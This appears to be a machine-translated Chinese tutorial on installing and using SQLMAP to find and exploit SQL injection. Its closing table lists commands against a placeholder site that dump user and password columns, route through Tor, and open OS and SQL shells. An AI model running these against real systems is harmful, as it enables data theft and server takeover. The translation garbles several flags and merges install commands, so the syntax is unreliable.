首页如何SQLMAP:如何测试您的站点的SQL漏洞

SQLMAP:如何测试您的站点的SQL漏洞

代替他 道德黑客行为,SQLMAP是基于以下工具查找漏洞的主要工具 SQL注入。 它是一种用python语言编写的开源解决方案,可自动发现和利用SQL漏洞,最终目的是完全控制数据库和数据库。 服务器 它所在的位置。

SqlMap的

它包括几个功能,例如数据库指纹识别,数据收集和命令行执行。 操作系统。 SQLMAP工具可用于以下目的:

  • 检查Web应用程序是否存在SQL注入漏洞
  • 利用SQL注入漏洞
  • 从数据库及其用户中提取数据
  • 绕过Web应用程序防火墙(WAF)
  • 完全控制基本操作系统

SQLMAP的一些最重要的功能如下所示:

  • 它可以支持MySQL,Oracle,PostgreSQL,Microsoft Access,Microsoft SQL Server,IBM DB2,SQLite,Firebird和Sybase技术。
  • 它还支持6不同的SQL注入技术:基于布尔的盲,基于错误,UNION查询,基于时间的盲,堆叠查询和带外。
  • 支持使用字典攻击技术查找哈希密码。
  • 允许抓取用户,哈希密码,角色,权限,基础,表和列。

什么是SQL注入?

SQL注入是一种黑客技术,攻击者可以通过对其进行修改 网址 或Web应用程序的其他字符输入字段可以将SQL命令直接插入数据库中。 这导致了压倒性的应用程序安全技术,因此,攻击者可以从整个数据库中提取数据,对其进行修改甚至删除。

它是对Web应用程序的最古老,最危险的攻击之一。 OWASP(开放Web应用程序安全项目)将注入威胁排名在10 Web应用程序安全威胁排名中(OWASP 10排名第一)。

使用方法

SQLMAP可用于操作系统 Windows, Linux的 και Mac。 您会发现它已预先安装在Linux发行版中以进行渗透测试,即Kali Linux。

Windows 

您应该执行的第一步是下载(如果尚未安装)python解释器-请记住,该工具是用python编写的。 您可以从下载最新版本 这里 (v 3.8.0)。

成功完成python安装后,请按照以下步骤操作:

  1. 下载它 压缩文件网站 SQLMAP。
  2. 将文件夹及其内容解压缩到所需位置
  3. 打开一个cmd控制台,然后导航到上一步中解压缩文件夹的位置。
  4. 运行sqlmap.py命令…。 并查看所有选项。
  5. 你准备好了

sqlmap SQL

Linux的

在几乎所有Linux发行版中 蟒蛇 默认情况下已安装。 如果不确定,请打开终端并输入 python –版本。 如果安装了python,则上述命令将为您显示版本。

SQL

然后运行以下命令以完成该工具的安装:

sudo apt-get install git
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-devpython sqlmap.py

最后一条命令将在屏幕上显示如下内容:

SqlMap的

使用方法

以下是一些可用于SQLMAP的基本命令及其说明:

命令 描述
sqlmap -u“ http://site.com/login.php” 简单检查特定的URL
sqlmap -u“ http://site.com/login.php” –tor –tor-type = SOCKS5 '使用Tor检查
sqlmap -u“ http://site.com/login.php” – time-sec 20 通过设置时间限制进行​​控制
sqlmap -u“ http://site.com/login.php” –dbs 选择返回Web应用程序的所有数据库
sqlmap -u“ http://site.com/login.php” -D site_db –tables 返回特定数据库的内容
sqlmap -u“ http://site.com/login.php” -D site_db -T用户–dump 返回特定表的内容
sqlmap -u“ http://site.com/login.php” -D site_db -T用户–列 返回表中的所有列
sqlmap -u“ http://site.com/login.php” -D site_db -T用户-C用户名,密码–dump 返回特定列的内容
sqlmap -u“ http://site.com/login.php” –方法“ POST” –数据“用户名= admin和密码= admin&Submit =提交” -D social_mccodes -T用户–dump 有管理员登录信息时返回表
sqlmap –dbms = mysql -u“ http://site.com/login.php” –os-shell 返回OS Shell
sqlmap –dbms = mysql -u“ http://site.com/login.php” –sql-shell SQL Shell返回

您可以找到有关SQLMAP的更详细信息 这里.

我们正在等待您的评论...

风暴
这是疯狂的,不合适的,反叛者,麻烦制造者......
spot_img

实时新闻